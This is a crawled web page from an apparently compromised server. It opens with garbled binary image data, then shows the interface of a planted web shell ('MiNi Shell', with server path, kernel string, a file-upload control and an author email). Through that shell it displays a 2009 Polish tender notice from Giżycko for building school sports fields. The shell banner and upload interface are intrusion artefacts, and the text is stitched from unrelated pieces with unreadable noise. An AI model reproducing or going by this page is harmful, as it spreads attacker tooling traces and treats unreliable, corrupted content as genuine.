JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090527/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090527/168536-N-2009.html

<p class="kh_header"><b>Giżycko: Budowa wielofunkcyjnych boisk sportowych przy SP nr 7 w Giżycku w ramach programu Moje boisko - Orlik 2012.</b><br>
<b>Numer ogłoszenia: 168536 - 2009; data zamieszczenia: 27.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Giżycko , al. 1 Maja 14/120, 11-500 Giżycko, woj. warmińsko-mazurskie, tel. 087 4282997, 4285231 w. 43, faks 087 4285241.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gizycko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa wielofunkcyjnych boisk sportowych przy SP nr 7 w Giżycku w ramach programu Moje boisko - Orlik 2012..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa boisk sportowych i budynku zaplecza w ramach budowy kompleksu Moje Boisko - Orlik 2012  w Giżycku przy  ul.  Wodociągowej 8 na  działkach  o  nr ewid. 237/2, 238, 242/1.
Przedmiot zamówienia obejmuje budowę wielofunkcyjnych boisk sportowych wraz zagospodarowaniem terenu o powierzchni całkowitej 7156 m2, wykonanie bieżni,  drenażu, przyłącza wod-kan., sieci deszczowej, elektrycznego, fundamentów  pod pawilony socjalne,    ogrodzenia, oświetlenia,  wyposażenie obiektu w sprzęt sportowy, montaż budynku zaplecza boisk.
	
1. Boisko piłkarskie o wym. 30m x 62m.

Nawierzchnia z trawy syntetycznej  o następujących parametrach technicznych :
- wys. włókna  : min. 60 mm,
- rodzaj włókna : włókna proste, monofilowe, o przekroju łukowatym wzmocnione  
  wtopionym   rdzeniem, 
- skład chemiczny włókna - polietylen,
- kolor nawierzchni : zielony,
- linie segregacyjne : wklejone w nawierzchnię,
Nawierzchnię należy ułożyć na  warstwach określonych w dokumentacji.
Podbudowa wodoprzepuszczalna z kruszyw łamanych wzmocniona 2 warstwami  
geowłókniny -  zgodnie z dokumentacja techniczną.

2. Boisko wielofunkcyjne przeznaczone do piłki koszykowej, ręcznej  i piłki siatkowej o wym. 30m x 50m;
Podbudowa wodoprzepuszczalna z kruszyw łamanych wzmocniona 2 warstwami  
geowłókniny - zgodnie z dokumentacja techniczną.
 Podbudowa elastyczna stabilizująca ET o gr. 25 mm, przepuszczalna dla wody. 
Warstwa użytkowa z granulatu SBR gr. 11-12 mm, warstwa natrysku 3-4 mm (mieszanina granulatu EPDM i PU).
Linie malowane farbą do poliuretanu. Kolor nawierzchni czerwony.
3. Bieżnia o powierzchni całkowitej 715 m2.
Nawierzchnia - warstwa elastyczna stabilizująca ET o gr. 25 mm, przepuszczalna dla wody. Warstwa użytkowa z granulatu SBR gr. 11-12 mm, warstwa natrysku 3-4 mm (mieszanina granulatu EPDM i PU).
Podbudowa wodoprzepuszczalna z kruszyw łamanych wzmocniona 1 warstwą  
geowłókniny.
Kolor bieżni czerwony, Pasy malowane farbą do poliuretanu.
4. Trybuny
Siedziska plastikowe o wymiarach 40 x 40 cm przykręcane śrubami do fundamentu   
betonowego. 76 siedzisk z lewej strony oraz 74 siedziska z prawej strony pawilonów kontenerowych.
Fundament pod siedziska wylewany z betonu B20 szerokość 20 cm zagłębiony 140 cm poniżej poziomu terenu, wystający 40 cm powyżej poziomu terenu.
5.Odwodnienie boisk i przyłącze kanalizacji deszczowej.
Odwodnienie powierzchniowe - system odwodnień liniowych montowany wzdłuż  
dłuższych krawędzi boisk. Zastosować odwodnienia liniowe ACO GALA typ 10.0  
(wysokość 20 cm ze  spadkiem lustra wody). Korytka systemowe z polimerobetonu  
układane na podbudowie betonowej.   
Odprowadzenie wody poprzez skrzynki odpływowe G100/EK58. Przykrycie - ruszty w poprzeczne mostki ze stali ocynkowanej z mocowaniem śrubowym, klasa obciążenia A15. 
Ponadto, zaprojektowano odwodnienie płyt boisk poprzez system drenażowy - rury  
drenarskie PCV-  U o średnicy 113 mm i dn 80 z otworami 2,5x5,0 z filtrem z włókna syntetycznego.
Przyłącze z rur PVC  dn 160 l =  98,5 m, oraz dn 200 l = 196 m , SDR 34 klasy SN8.      
6.Oświetlenie i zasilanie budynku zaplecza.
 Oświetlenie obiektu będą stanowiły oprawy projektorowe, każda  o mocy 400 W,  zamocowane  na 10 masztach (ze stali ocynkowanej) o wys. 9m. Na każdym maszcie należy zamontować po dwie oprawy. Projektowane maszty należy zamontować na prefabrykowanych fundamentach typu F 150/200.
 Przyłącze do lamp zostanie doprowadzone  z istniejącej szafki znajdującej się w budynku szkoły. 
Zasilanie należy wykonać z tablicy TC szkoły instalując w niej zabezpieczenie Bi 50A. Złącze kablowe zintegrowane z szafką pomiarową z tworzywa sztucznego, trudnozapalnego, ustawiane na typowym prefabrykowanym fundamencie.
7. Ogrodzenie i piłkochwyty.
  a) Ogrodzenie terenu o powierzchni 1508 m2 na słupkach stalowych, mocowanych na  wylewce betonowej. Wypełnienie z siatki stalowej powlekanej gr. 3,5mm., oczko 60 x 60mm. Rozstaw słupków 2,5m. Furtki i bramy systemowe rozwierne. Wysokość ogrodzenia 4m, kolor  zielony.
 b) Piłkochwyty o wysokości 6,0 m i powierzchni 540 m2 (3 szt. po  30 mb) oraz o wysokości 4,0 m i powierzchni 397,60 m2 na słupkach stalowych mocowanych na podmurówce betonowej. Wypełnienie z siatki polipropylenowej 120x120x3mm. Rozstaw słupków 2,5m. Furtki i  bramy systemowe rozwierne. 
  Kolor piłkochwytów zielony. Piłkochwyty o wysokości 6,0 m zamontować pomiędzy boiskami (30 mb),  wzdłuż skrajnych krótszych krawędzi obu boisk ( 2 x 30 mb), piłkochwyty o wysokości 4,0 m wzdłuż bieżni ( 43,80mb + 55,60 mb).
8. Chodniki i dojścia. 
   Konstrukcja nawierzchni dla chodników o łącznej powierzchni - 715 m2:
   -   polbruk grubości 6cm, na ciągach pieszych oraz grubości 8cm na projektowanym zjeździe z ul. Królowej Jadwigi i dojeździe do bramy,
   -   podsypka piaskowa 0,4-2,0mm, grubości 5cm,
   -   pospółka z dodatkiem kruszywa łamanego do 16 mm o grubości 15 cm,
   -   warstwa odsączająca piaskowa 10 cm,
   -   podłoże gruntowe wyrównane i zagęszczone do współczynnika Id = 0,95.
      Chodniki z polbruku 6 cm obramowane obrzeżem bet. o wymiarach 8 x 30 x 100cm ustawionym  na podsypce cementowo - piaskowej, dojazd z polbruku gr. 8 cm o powierzchni 147 m2  krawężnikiem betonowym o wymiarach 15 x 30 x 100cm.
      Wody opadowe chodników odprowadzone powierzchniowo bezpośrednio na teren zielony lub do odwodnień liniowych. Chodniki  z polbruku w kolorze szarym.
   Ciągi komunikacyjne, place użytkowe,  z kostki betonowej gr. 6cm w kolorze szarym, na podbudowie z piasku i kruszywa, zamknięte obrzeżem betonowym o wym. 8x30x100 cm ustawionym na podsypce cementowo - piaskowej.
9.  Zagospodarowanie terenu.
 Należy zagospodarować pozostałą część działki poza boiskami poprzez ułożenie 10cm  warstwy z   torfu i ziemi żyznej oraz zasianie trawy na łącznej powierzchni 2390 m2.
10.  Fundament pod budynek zaplecza.
   Wylewany z betonu.B-20. 
   Pręty nośne fi 12 ze stali A3 (34GS).
  Pręty rozdzielcze, strzemiona fi 6 ze stali A1 (St0).
11. Wyposażenie sportowe :
a. Piłka siatkowa 
    - Słupki aluminiowe montowane w tulejach z regulacją wysokości mocowania   
      siatki i   mechanizmem naciągowym. Ilość: 2 zestawy.
- siatka do siatkówki  - całosezonowa        - 2 szt.
- siatka do badmintona      - 1 szt.
b. Piłka nożna
- bramki aluminiowe (2 x 5m) mocowane w stalowych, ocynkowanych tulejach,
   w komplecie tuleje oraz haczyki do  mocowania siatki                -   2 szt.
  - siatki do bramek                                                                -   2 szt.
 -  chorągiewki przegubowe do zaznaczania narożników boiska       -   4 szt.

c. Piłka koszykowa 
    Stojak stalowy ocynkowany o regulowanej wysokości, montowany tulejach,    
    tablica   epoksydowa w stalowej ocynkowanej ramie 180x105cm, obręcz  
    uchylna, siateczka do obręczy. Ilość: 4 zestawy. 
d. Tenis
- siatka ze słupkami do tenisa - 1 kpl.
e. Piłka ręczna
- bramki do piłki ręcznej z siatkami - 2 kpl.

12.  Budynek zaplecza boisk.
 Budynek z prefabrykowanych modułów drewnianych lub stalowych, zawierający oddzielne pomieszczenia: trenera, magazyn, łazienkę dla chłopców, łazienkę dla dziewcząt przystosowaną dla osób niepełnosprawnych, o łącznej powierzchni użytkowej 23,28 m2. Poszczególne elementy budynku należy wykonać zgodnie z projektem technicznym.
  Budynek zaplecza musi być wykonany zgodnie z prawem budowlanym oraz prawami pokrewnymi i szczegółowymi. Pomieszczenia muszą posiadać minimalne wielkości i być zgodne z Rozporządzenie Ministra Infrastruktury z 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. 2002 r., Nr 75, poz. 690). Wszystkie materiały użyte do budowy muszą posiadać odpowiednie certyfikaty i dopuszczenia do stosowania w budownictwie.
Zamawiający dopuszcza montaż  budynku zaplecza wykonanego w systemie kontenerowym wg technologii własnej producenta, pod warunkiem zachowania niezmienności elewacji i układu funkcjonalnego budynku oraz parametrów technicznych ( z zachowaniem obowiązujących norm i przepisów prawa budowlanego).
Szczegółowy zakres robót obejmuje dołączona dokumentacja techniczna i specyfikacja szczegółowa wykonania i odbioru robót.

13. Zaleca się, aby Wykonawca dokonał przeglądu  placu budowy oraz jego otoczenia i pozyskał dla siebie na swoją własną odpowiedzialność i ryzyko wszelkie informacje, które mogą być niezbędne w przygotowaniu oferty oraz przy zawieraniu umowy na wykonanie robót gdyż wyklucza się możliwość roszczeń wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy. Koszty takiej wizyty ponosi Wykonawca.
14.  Zakres prac oraz odpowiedzialność Wykonawcy w zakresie objętym proponowaną ceną ofertową obejmuje także:
- koszty organizacji placu budowy,   
- koszty ubezpieczenia budowy, 
- koszt zagospodarowania odpadów zgodnie z obowiązującymi przepisami,
- koszt opracowania Planu bezpieczeństwa i ochrony zdrowia (BiOZ).
Bezwzględnie wymagany termin realizacji zamówienia okres 100 dni od dnia  podpisania umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.00-8, 45.23.24.51-8, 45.23.24.40-8, 45.23.21.50-8, 45.31.12.00-2, 45.23.14.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 100.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 30000<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Art. 22 ust. 1 pkt. 1 
Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj.: 
- prowadzą działalność gospodarczą na zasadach określonych w przepisach ustawy z dnia 2 lipca 2004 r. o swobodzie działalności gospodarczej;
2. .Art. 22 ust. 1 pkt. 2
Posiadają niezbędną wiedzą i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia  lub przedstawią pisemne zobowiązanie innych podmiotów  do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj.: 
- wykonali w ciągu ostatnich 5 lat co najmniej jedno zamówienie odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia na wartość  nie mniejszą niż  500 000,00 PLN w charakterze głównego wykonawcy;
- zapewnią, aby czynności objęte zamówieniem były wykonywane bezpośrednio pod nadzorem osób legitymujących się posiadaniem uprawnień budowlanych do kierowania robotami w specjalnościach: konstrukcyjno -  budowlanej, sieci i instalacji wodociągowych i kanalizacyjnych, elektrycznych;
3. Art. 22 ust. 1 pkt. 3
Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj.:
- posiadają środki finansowe na podstawowym rachunku bankowym lub zdolność kredytową w wysokości min. 500 000,00 PLN.;
- są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min. 300 000,00 PLN;
4.Art. 22 ust. 1 pkt. 4
 Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (szczegółowo opisany w art. 24 ustawy - Prawo Zamówień Publicznych)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> art. 22 ust. 1 pkt. 1
Wymagane dokumenty:
- aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub  zgłoszenia do  ewidencji działalności  gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
art. 22 ust. 1 pkt. 2
Wymagane dokumenty:
- wykaz  zrealizowanych   zadań   w   ciągu   ostatnich  5 lat  o  zakresie podobnym rodzajem robót i wartości  min. 500 000,00 PLN do przetargowego   z określeniem ich wartości i zakresu wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie (np.  protokoły odbioru robót, referencje itp.) - Załącznik nr 4 do SIWZ;
- wykaz kluczowego personelu przewidzianego do realizacji zamówienia wraz z odpisem uprawnień  budowlanych w wymaganych specjalnościach oraz aktualne zaświadczenia Polskiej Izby Inżynierów Budownictwa - Załącznik nr 5 do SIWZ; 
art. 22 ust. 1 pkt. 3
Wymagane dokumenty:
- informacja banku, w którym Wykonawca posiada podstawowy rachunek bankowy, potwierdzająca wysokość  posiadanych środków  finansowych lub zdolność kredytową wykonawcy, wystawiona  nie wcześniej niż 3 miesiące przed upływem terminu składania ofert na  kwotę min. 500 000,00 PLN;
- polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony na kwotę min. 300 000,00 PLN od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. Dopuszcza się załączenie w ofercie promesy polisy lub promesy innego dokumentu ubezpieczenia potwierdzającego, że Wykonawca zostanie  ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na wymagane w SIWZ kwoty, z zastrzeżeniem, że wybrany Wykonawca najpóźniej w dniu podpisania umowy ma obowiązek przedstawienia stosownego dokumentu.
art. 22 ust. 1 pkt. 4
Wymagane dokumenty:
- aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie  zdrowotne 
i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 
- oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust.1 i nie został wykluczony na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.gizycko.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Techniczno - Inwestycyjny (pok. 114) Urzędu Miejskiego w Giżycku, 
al. 1 Maja 14, 11-500 Giżycko.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.06.2009 godzina 13:00, miejsce: Sekretariat (pok. 104) Urzędu Miejskiego w Giżycku, al. 1 Maja 14, 11-500 Giżycko.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com